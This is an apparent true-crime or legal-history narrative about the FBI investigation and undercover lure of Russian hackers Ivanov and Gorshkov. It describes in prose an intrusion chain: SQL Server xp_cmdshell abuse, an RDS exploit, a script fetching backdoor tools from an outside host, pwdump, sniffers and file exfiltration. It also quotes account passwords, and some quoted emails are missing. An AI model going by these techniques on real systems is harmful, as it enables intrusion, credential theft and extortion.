New Haven’s interest in the case began when someone named Alexey broke into the computer systems of Online Information Bureau, Inc., (OIB, Inc.,), a Connecticut-based merchant credit card processing company, and attempted to extort that company. OIB, Inc., is an Internet e-commerce business that processes merchant credit card information and hosts websites for other businesses. In its simplest form, customers transact credit card purchases over the websites of online merchants. Those online merchants then send their customers’ credit card charges each day to the processor. OIB and other credit card processing companies then sort those charges and send them to the banks that issued the customer’s cards. The processor then routes the payments it receives from the issuing banks back to the merchants’ accounts. Merchant credit card processors are thus an integral part of the financial system, handling thousands of transactions each day. Hence, intrusions into the seemingly secure servers of the merchant credit card processing companies can expose millions of credit card accounts to hackers and have the potential to result in substantial fraud losses throughout the system. Special Agents Ken Gray and Archie T. Stone of the FBI’s New Haven Division opened a case.

When Special Agents Gray and Stone began looking into the matter, they learned that, near the end of January 2000, OIB, Inc., started receiving a number of emails from an individual identifying himself as “Alexey.” In these emails, Alexey bragged that he had obtained root passwords for OIB’s systems, passwords that allowed him to control a significant portion of OIB’s computer systems. Alexey stated that if OIB, Inc., paid him, he would check the OIB, Inc., computer systems for security flaws and tell OIB how to protect its network. The text of the first email is reminiscent of Alexey’s communications with Max Chandler at Speakeasy. Interestingly, Alexey’s email address was [email protected]. (Lightrealm was a Seattle-based ISP and web hosting company.) Alexey wrote:

When OIB did not respond promptly, Alexey resent the same message to several persons at OIB, using email addresses that were only available within the internal OIB network. OIB, Inc., refused to pay and informed Alexey that it had already hired a computer security firm. When Alexey persisted in sending numerous messages, OIB asked him to stop his solicitations.^[1]

Alexey refused to desist, and continued to email OIB, Inc., seeking cash payments for protecting its computer system. To demonstrate that he had successfully cracked into OIB, Inc.’s computer system, he provided OIB, Inc., with secret passwords for its systems which Alexey could only have obtained by cracking the OIB, Inc., computer system. Alexey stated that unless he was hired and paid money by OIB, Inc., OIB risked having its system cracked, its customer information and funds stolen, and its computer system destroyed. On February 3, 2000 at 9:23 A.M. PST, Alexey wrote:

An examination of the OIB, Inc., computer system revealed that it was cracked only a few days before Ivanov began communicating with OIB, Inc. On January 25, 2000, three of the OIB, Inc., computer servers had software installed that was foreign to these systems and that was not installed by OIB, Inc. The OIB audit also determined that the superuser logs of two of the systems, which log record activity on these systems by individuals with system administrator authority, had been turned off or deleted.^[3]

Soon after Special Agents Ken Gray and Archie Stone went to work on the OIB, Inc., intrusion, they found that they had entered a complex labyrinth of interrelated crimes. For starters, Alexey had identified himself as a security engineer at Lightrealm and was using a Lightrealm.com email address, [email protected]. The agents soon learned that Alexey’s characterization of himself as a “security engineer” at Lightrealm was not entirely fanciful.

Raymond Bero was an assistant administrator at Lightrealm, a Seattle-based company that was in the primary business of hosting websites for e-commerce businesses.^[4] One Sunday in September of 1999, Mr. Bero was performing administration work on a Lightrealm computer called “getstats.com.” He became aware that an intruder had logged on to the system with root privileges from an IP address in Russia. Without letting the intruder know that he had been detected, Mr. Bero began to examine other machines on the network and learned that Lightrealm’s entire network appeared to have been compromised. Using a machine that he believed was secure, Mr. Bero began attempting to lock the intruder out, only to have all of the processes that he was running on the “secure” computer killed by the hacker. Realizing at that point that he did not know how to get the trespasser out of his network, Mr. Bero used the “talk” command to contact him and learn what he wanted.^[5]

During the course of the ensuing communication, the hacker identified himself as Alexey Ivanov and told Bero that he wanted a job in America. As an inducement, Alexey offered to reveal to Bero how he had gotten into the Lightrealm system. Even though Alexey had broken into the Lightrealm network and had root powers, Bero testified that he “didn’t see anything that he’d done wrong.” Notwithstanding that Alexey had root access to the entire system, had killed admin-run processes, and could have done anything he wanted to, Bero testified that he had been unable to detect any activity on his part that rendered Alexey untrustworthy.^[6]

In truth, Ray Bero and his colleagues at Lightrealm were helpless to control the 19-year-old Russian hacker, whose skill levels were above their own.^[7] In a series of emails, the dates of which were not preserved, Alexey corresponded with Ray Bero and Mike Smith at Lightrealm. In those messages, Alexey identified numerous security holes in the system and offered to fix them.^[8] He found five that were significant enough to warrant payments by Lightrealm. Mr. Bero arranged for Alexey to be paid by Lightrealm, and money was wired to an account in Ivanov’s name at Chelyabinvestbank, in Chelyabinsk, Russian Federation.^[9]

Over the next few months, Alexey “hung out” in Lightrealm’s network, where he continued to find and report computer security vulnerabilities. Mr. Bero actually assigned a Unix-based computer to Alexey to “play around” with. The IP address of that computer, 216.122.89.110, was to become heavily involved in illegal activity. Mr. Bero also created an email address for Alexey, [email protected].^[10]

During the course of his relationship with Ray Bero and Lightrealm, which extended over a period of months, Alexey Ivanov discussed his intentions of starting a computer security business. Ivanov planned to hack into companies, point out their security holes, and be rewarded for his efforts. Bero tried to explain to Alexey that some system administrators might not be as accepting of his efforts as he had been. Alexey then requested information on U.S. laws on computer intrusions.

So accepting was Mr. Bero that he continued to express an interest in bringing Alexey to the United States and employing him as a network security employee. He also volunteered to help Alexey obtain employment with other high-tech companies. Alexey was interested and promptly sent his résumé. Lightrealm also went so far as to send Alexey a letter inviting him to come to the United States for a job interview. Such an invitation was a prerequisite for Alexey to obtain a Visa from the United States Consular Office in Russia.^[11]

Despite his insistence that he had not seen Alexey do anything wrong, Mr. Bero, while under oath at the trial, identified scores of credit card transaction databases that belonged to Lightrealm’s business customers. Those databases had been recovered from computers in Russia that were used by Alexey Ivanov. He also acknowledged that sniffer logs recovered from the Russian computers established that Alexey had been intercepting log-ins, passwords, and credit card transactions on the Lightrealm system during his “trustworthy” relationship with Bero. Finally, in January Lightrealm had been contacted by an outraged system administrator from OIB, Inc., in Connecticut, who complained that Alexey had been attempting to extort money from that company while using a Lightrealm email address and representing himself to be a Lightrealm employee.^[12]

During the Fall of 1999, while this activity had been going on, Micron Electronics, Inc., had been negotiating to acquire Lightrealm. When corporate legal counsel learned of the lurking presence of a Russian hacker on the system and that OIB, Inc., had been extorted, Mr. Bero was instructed to get him out of the network and to terminate the relationship. He responded by telephoning Alexey at the number listed on his résumé. Mr. Bero explained to Alexey that he could no longer permit him to have the run of the Lightrealm system. Alexey promised to remove his programs from the system, but persisted that he wanted to come to the United States and find work in computer security. In order to help him, Mr. Bero arranged for Alexey’s Lightrealm email account, [email protected], to be forwarded to [email protected], yet another hacked account. He also informed Alexey that the FBI was investigating his activities at OIB and that things were “too hot” for him to come to the United States at that time.^[13]

Ray Bero’s attitude throughout his encounters with the FBI and the Department of Justice lawyers could charitably be described as defensive. After all, he had consistently been outmaneuvered by a 19-year-old, and his inability to secure the system that was his responsibility had exposed Lightrealm to significant potential liability. Therefore, such a frame of mind might be understandable. Nevertheless, while under oath at Gorshkov’s trial and when faced with incontrovertible facts, such as databases reflecting Alexey’s theft and use of credit cards from the Lightrealm system, Ray Bero reluctantly acknowledged that Alexey had committed crimes. Off the stand, however, he persevered in his denial that Alexey had intended to do anything wrong. Indeed, several years after his trial testimony, when Alexey was about to be sentenced in Connecticut, Ray Bero included the following passage in a letter that he wrote to the Judge on Alexey’s behalf:

The joint proposal was to create an undercover start-up computer security company in Seattle, Washington, under the supervision of the Seattle Office of the FBI. Office space would be leased, phones installed, and an Internet account opened, all in the name of a fictitious business called “Invita.” The Seattle FBI had also arranged for the expert assistance of a former Microsoft employee who was now involved in an Internet security firm. He would be available lest the communications with the Russian take a technical turn that the agents could not handle.

In order to qualify the lure for approval, Ivanov was charged in a sealed complaint filed in the District of Connecticut with: (1) interference with commerce by means of threats and extortion, in violation of 18 U.S.C. § 1951; (2) intentionally accessing a computer without authorization, in violation of 18 U.S.C. § 1030(a)(2); and (3) transmitting in interstate or foreign commerce communications containing a threat to cause damage to a protected computer with the intent to extort any money or other things of value, in violation of Title 18 U.S.C. § 1030(a)(7). All of these charges were related to Alexey Ivanov’s activities vis-à-vis Online Information Bureau, Inc., in Connecticut.^[15]

Once the lure was formally approved, events began to move quickly. On Wednesday, June 21, 2000, Special Agents Marty Prewett, Milan Patel, and other colleagues of the Seattle FBI Office composed and sent an email to Alexey Ivanov at [email protected]. Using the undercover name “Michael Patterson,” Special Agent Patel testified that he was asked to assist in the undercover operation because he had already established an undercover email account that could not be traced to the Government.^[16] In his initial email to Ivanov, he wrote:

On July 1, 2000, Alexey Ivanov responded:

Alexey sent his résumé to “Michael Patterson” that same day.^[19] He was obviously interested in working with a U.S. company, and seemed to be rising to the lure. The agents and prosecutors were also intrigued by Alexey’s reference to his “business partner,” Vasily Gorshkov. This was a new name. While the volume of the attacks on U.S. systems had been large enough to make it likely that more than one person was responsible, it was Alexey’s name and “handle” that were all over the victims’ logs. Now there was a new character in the plot.^[20]

Although there was sufficient evidence to formally charge Ivanov with computer crimes, Gorshkov’s situation was more problematical. The undercover team did not have sufficient information with which to charge Gorshkov with criminal offenses, as it had first learned his name only during communications with Ivanov, who identified Gorshkov as his partner. Unless some valid means to arrest and hold Gorshkov could be derived, he would be free to return to Russia following the undercover meeting. Given the lack of cooperation that had been received from Russia to date, his return to Russia would effectively shield him from prosecution.

The Government’s occasional need to obtain testimony from foreign witnesses is addressed in several places in Title 18, the Federal Criminal Code. Collectively, the several statutes and rules provide for Material Witness Warrants. Section 3144 provides that, if it appears from an affidavit filed by a party that the testimony of a person is material in a criminal proceeding, and it is shown that it may become impracticable to secure that person’s presence by means of subpoena, the court may order the arrest of that person. That statute, by reference to Section 3142 (which pertains to the detention without bail of criminal defendants) also provides that a person arrested as a material witness may be detained for a reasonable time until his or her deposition can be taken.

In turn, Rule 15 of the Federal Rules of Criminal Procedure provides that, in the case of a detained witness, a Federal court may order that the deposition of that witness may be taken under oath. In order to preserve the Constitutional rights of a defendant against whom the deposition testimony might later be offered at trial, the Rule requires that the defendant be given the opportunity to attend the deposition with counsel. A defendant’s right to discovery of evidence in the Government’s files can also be accelerated by the Court, so that his or her counsel can meaningfully cross-examine the witness.^[21]

Gorshkov seemed to meet all of the criteria of a Material Witness. Ivanov had been strongly linked to a series of illegal computer intrusions and extortion attempts. Gorshkov was identified as his partner. Consequently, Mark Califano obtained a Material Witness Warrant for Gorshkov from the United States District Court for the District of Connecticut. The warrant directed that he be arrested and transported to Connecticut for a deposition. The authorization for the undercover lure was expanded to include Gorshkov.

After consulting with Special Agent Marty Prewett, the Seattle FBI case agent, Milan Patel, still in the role of Michael Patterson, sent a message to Alexey on July 7, 2000, thanking him for his résumé. In that same message, he told Alexey that the idea of collaborating with a partner in Russia was “intriguing” and that he would be interested in discussing the idea further. He then raised the idea of Alexey’s traveling to the United States and asked him if he would be willing to come. Finally, Milan asked Alexey to suggest a time when he could telephone him to discuss the matter further.^[22] When Alexey did not immediately respond, Special Agent Patel resent the message to both of the email addresses that he (Alexey) had provided in his initial response, [email protected] and [email protected].

On July 9, 2000, Special Agents Patel and Prewett received three email messages from Alexey. In the first, Alexey provided a new telephone number, 7-3512-788449, which he said was a cellular phone that could be called at any time. While he had never been to the United States, Alexey explained, he had done some security projects for CTS, where he had worked with Jim Fitzgerald. Alexey invited Michael Patterson to contact Mr. Fitzgerald at [email protected], with whom he had worked. Alexey also provided URLs at tech.net.ru where Patterson could view web pages that Alexey’s company had designed. Alexey also indicated that, “if you want to see me in U.S.,” he would need sponsorship from Invita in order to obtain a Visa.^[23]

On July 14, 2000, the undercover team prepared to make a telephone call to the first cell phone number provided. Special Agents Patel and Prewett were both members of the FBI’s Computer Crime Squad and had received considerable training in the field. In addition, Special Agent Patel had an Electrical Engineering degree and had worked on digital electronics in the Air Force. Nonetheless, to ensure that there was sufficient expertise available to credibly discuss network security, Special Agent Patel asked Brad Albrecht, a security manager for Microsoft Network (MSN) to actually make the call as “Michael Patterson.” Special Agent Mike Schuler was also present. Mike had been involved in the case from early on, would provide critical insights and analysis as the case progressed, and ultimately became co-case agent.^[24]

Prior to actually placing the call, Marty Prewett, the case agent, obtained the requisite bureaucratic approvals to make a consensually monitored call. In plain English, this phrase invokes an exception under the Federal wiretap statute’s general prohibition against intercepting communications without a court order, if the interception is for law enforcement purposes and it is done with the prior consent of one party to the communication.^[25] This issue brings with it some sensitivity only because some states, including the State of Washington, generally prohibit recording communications without the consent of all of the participants. If done as a part of a Federal law enforcement investigation, however, the recording of a conversation with the consent of only one party is exempt from state law by reason of the Supremacy Clause of the U.S. Constitution, which makes the laws of the United States the supreme law of the land.^[26]

After some problems with connectivity, the call went through and a Russian male voice answered, “Hello.”^[27]

“Alexey?” asked Brad Albrecht. “Alexey? Hi, my name’s, uh, Michael Patterson. I’m with Invita.”

“Hello,” the voice responded. A distinctive Brooklynese accent was soon discernible. In response to “Patterson’s” query whether it was a good time to talk, the voice replied, “I can talk.” Brad then attempted to turn the conversation to the requirements of a sponsor letter and U.S. Visa. The man on the other end seemed anxious to get to the nub of the matter.

“You know, we need only to be in America,” he said. “We have right now here a small firm, uh, uh, which works, works on software business….”

“So if you’re interested, uh, we can go to America, live there and work for you and all our firm will, uh, will work for you.”

“Cool, yeah…,” Brad (coached by the agents) encouraged him.

The Russian male continued to tout his company. “[We have] about 20 employees right now here. We have several projects, uh, already worked. So…” He then began to describe several website design projects that they had done. When Brad Albrecht told him that Invita was interested in the networking projects that they had done, the response was prompt.

“We don’t, uh, do, we can help you, with this, we have several, uh, very, uh, good specialists with, uh, with security.” “You can, uh, hacker,” he clarified. “[R]ight, right now there is about 20, uh, 12 programmers and three really hackers, so you know, that work…. Uh, they are specializing on security problems.”

“Right,” Brad encouraged.

“So they can fix it and they can broke it.”

Brad made it clear that it was those “security” aspects of what the Russian company did that were of interest to Invita. The call was then dropped.

Upon reconnecting, the conversation returned to the security question. The Russian male suggested that his company be given a chance to demonstrate the skills of its employees. “Maybe you can provide the, us with information about some site. We can see it and we can say it is secure or maybe it is totally unsecure. We can broke it or we can help to fix it.” This was a suggestion that he repeated several times.

In response to several questions regarding the type of problems that Invita needed help with, the agents coached Brad Albrecht to explain that Invita was trying to build a customer base and that it was not seeking help with specific security issues. In order to head off a defense that the Russian hackers thought they were coming to the United States to engage in legitimate security consulting, Steve Schroeder had instructed the agents to make it very clear in the communications with the hackers that an illegal model was intended—that the partnership would break into systems without prior authorization and then attempt to obtain payment for revealing and closing security holes. This was, in fact, the very model that had been followed by Alexey with OIB and Speakeasy.

Brad Albrecht gave it a shot, but was obviously uncomfortable in his role as a hacker entrepreneur. “[A]s a company,” he explained, “we can go in and say, hey, we see that you guys have a hole here and we’ll help you to fix that hole so that you no longer have these security problems. We’ll help you to set up your network correctly so you won’t have problems in the future or, ya know, we’ll be here to^[28] you can keep callin’ us back and, and, uh, ya know, hopefully, we’ll get a good business….” Thus, the illegal nature of the proposal was not made crystal clear, but it turned out to be sufficient.

Shortly after this telephone conversation, Alexey sent an email message to Michael Patterson, in which he repeated the proposal, made during the call, that Invita set up a test network for them to hack.^[29]

On July 27, 2000, the undercover team composed another email from “Michael Patterson” to Alexey. In that communication, the agents reported that Invita was busy accumulating clients that were interested in security services and that “the owners” of Invita were interested in meeting with Alexey in the United States. As to Alexey’s proposal to do a test hack to demonstrate his abilities, the undercover team related that the owners liked the idea and suggested that it could set up for their meeting in Seattle. The prospect of the Russian hackers blithely demonstrating their hacking skills while their every move was monitored by video, aural, and electronic surveillance was delicious. The undercover team also asked what had to be done in order for Alexey to obtain a Visa to travel to Seattle.^[30]

The questions about Visas were calculated to convince Alexey that he was dealing with a start-up company comprised of persons who were relatively unsophisticated about international travel. In fact, the FBI was already working on the Visa issue through its Legal Attaché in Russia. If the Russian hackers agreed to travel to the United States (under circumstances carefully controlled by the FBI), the requisite Visas would be issued by the Consular Office nearest their home.

When Alexey persisted that he wished to demonstrate his skills prior to traveling to Seattle, however, the undercover team rethought the idea. If a network could be set up for the Russians to hack, the tools and techniques that they used, and the vulnerabilities that they exploited, could be precisely identified. In addition, the logs from the monitored target system would reveal the IP addresses from which the hackers were coming in. Consequently, the FBI contracted with Sytex, Inc., a Department of Defense contractor.

Sytex set up a research network consisting of eight computers and a Flowpoint 2200 Router. The machines ran a number of operating systems and commercial database programs and were configured with an increasing level of security sophistication. When setting up the network, Curtis Rose, the Sytex Director of Investigations and Forensics, installed TCPDump, a packet capture utility or packet sniffer developed by Lawrence Berkeley National Laboratory.^[31]

On October 20, 2000, the FBI undercover team sent the following message to Alexey from the Michael Patterson account:

Using a PowerPoint presentation that he had prepared,^[33] Curtis Rose testified that the initial probe occurred on October 22, 2000, and came from an IP address registered to Cyber Express Communications, Ltd., in Kowloon, Hong Kong. This was almost certainly a compromised machine. Eleven seconds later, a connection attempt was made from Chelyabinsk, Russia. NetBIOS/Server Message Block scans were performed and a list of users was pulled up. The list included one jpace and one mpatterson, the undercover names used in the lure.^[34]

The intruder then attempted to log in to the computer named enterprise by entering the usernames as passwords. It is a common security problem that lazy users often simply repeat their usernames as the passwords on a system. He then pinged three additional computers on the Sytex network and ran a port scan to learn what ports were open on those machines. On the computer named enterprise, the hacker discovered that port 1433, the port number assigned to Microsoft SQL, was open.

Enterprise, an NT 4.0 SQL Server, was compromised within 13 minutes of the furnishing of the IP addresses to Alexey. It was accomplished by exploiting a well-known security hole. By exploiting this common security hole, Alexey obtained administrator privileges on the machine.^[35]

Once he compromised enterprise, the intruder received a prompt from the xp_cmdshell on the SQL Query Analyzer window. He then executed a series of commands that were designed to give him information about the system that he had accessed. Netstat gave him the status of the network and the “dir /s” command gave him a listing of directories and subdirectories on the system.^[36]

Attacks were launched from several IP addresses, including 195.128.157.67, registered to tech.net.ru, and 209.68.192.180, associated with king.cts.com, a computer belonging to CTS Network Services in San Diego, California. The intruder also connected once from an IP address registered to Hanaro Telecom, South Korea.^[37]

The intruder also launched an RDS attack on one of the Sytex computers.^[38] Microsoft Internet Information Server (IIS) is web server software that runs under Windows NT. It supports SSL security protocol and turns an NT-based PC into a website. RDS (Remote Data Services) is a program that allows users to update data on IIS servers from another computer with an ActiveX-enabled web browser. Specifically, RDS allows remote database object access through IIS. RDS includes a component called the DataFactory object which has a vulnerability that allows a user to obtain unauthorized access to unpublished files on the IIS server and use MDAC^[39] to tunnel ODBC requests through to a remote internal or external location.

If the Microsoft JET OLE DB Provider or Microsoft DataShape Provider are installed, an attacker could use the shell() VBA command on the server with System privileges. These two vulnerabilities combined can allow a remote attacker to run arbitrary commands with System level privileges on the target host.

The intruder also caused a number of commands to be entered from the xp_cmdshell. Based on the speed of the entries, Curtis Rose concluded that the commands were executed by a script. By means of this script (which turned out to be a PERL script), the intruder echoed or copied a text file called c: winntftp_comm, which he created on enterprise. This script was designed to connect to an account named ctsavi on king.cts.com in San Diego, California, and download intrusion tools.^[40]

Interestingly, the script connected to king.cts.com, opened user account ctsavi, and entered the password for that account, FynjyKj[. The script then entered a command to change to a directory called “bd” (for backdoor), and then executed a series of “get” commands to download a number of hacker tools or programs, including the following:

Execution of the pwdump command on the Sytex computer named enterprise captured the usernames and encrypted passwords of all the users on the system. The intruder then initiated a telnet session from tech.net.ru to port 26405 on enterprise, his new backdoor. After snooping around a bit, the intruder found a file called sys.mdb, a file extension that generally denotes a Microsoft Access database, a place where one might expect to find customer data and credit card information. He then initiated an FTP session to tech.net.ru, where he logged in as user subbsta with the password FynjyKj[, and transferred the sys.mdb file to his computer in Russia. Next, he checked his current directory, /home/subbsta. Changing to directory /home/subbsta/disk1/hack/nt, he then downloaded several files associated with a sniffer program.^[41]

Preparatory to installing the sniffer on enterprise, the intruder then entered an “ipconfig -all” command, which would give him the IP address and network configuration information about that system. He then launched the sniffer program smmsniff.exe and directed its output to a new file called log. This sniffer enabled the intruder to capture all activity on the network, including user IDs and passwords in clear text.^[42]

On October 23, 2000, the intruder used FTP from tech.net.ru to connect to the computer named discovery. He logged on as root with a password of invita4500. This was information that the intruder did not have before and, since no one had logged on to that account, the sniffer could not have captured that password. Therefore, the intruder must have used a tool like L0phtCrack^[43] to decrypt the user IDs and passwords that he obtained with pwdump.^[44]

Finally, the intruder successfully connected to a third Invita computer, atlantis. He accomplished this by the simple but common expedient of attempting the same username and password that he had obtained from discovery. Because Sytex wanted to create a typical computer network, this common security breach was put in place.^[45]

The intruder used a number of tools, such as SuperScan, that are readily available on the Internet for download. Many were relatively simple to use, and some had legitimate uses by system administrators. Likewise, his knowledge of Unix did not seem extensive. Nevertheless, the intruder did not perform several operations that are the hallmark of novice hackers. He did not, for example, use an automated root kit, and he did not add easily identified accounts. In addition, the intruder did not delete any system files. He also ran PERL scripts that required some sophistication to write. In sum, Curtis Rose concluded that the hacker’s skill sets put him well above the level of script kiddies, and that the tool suite and techniques that were used represented a significant threat to e-commerce sites.^[46]

On October 24, 2000, Alexey sent the following message to mpatterson:

Several days later, on October 27, 2000, Alexey explained some of the vulnerabilities that he had found:

Meanwhile, arrangements to have U.S. Visas issued to Ivanov and Gorshkov were moving ahead. On October 30, 2000, Alexey emailed Michael Patterson that he had “good news.” “[M]e and my business partner got Visa today.”^[49] They planned to arrive in Seattle on November 10 shortly after noon.

As the lure moved toward culmination, the prosecutors and FBI agents gleefully contemplated the likelihood that two international criminals would soon be in their grasps. Would they really come? Undercover operations, designed to catch criminals in the act of committing crimes, often go awry. Sophisticated subjects can be wary and use the undercover meetings to generate false exculpatory statements. Or, they can simply get cold feet and not show up. These guys, however, seemed determined, even eager, to come to Seattle. Would greed and ambition induce the young Russian hackers to take the lure?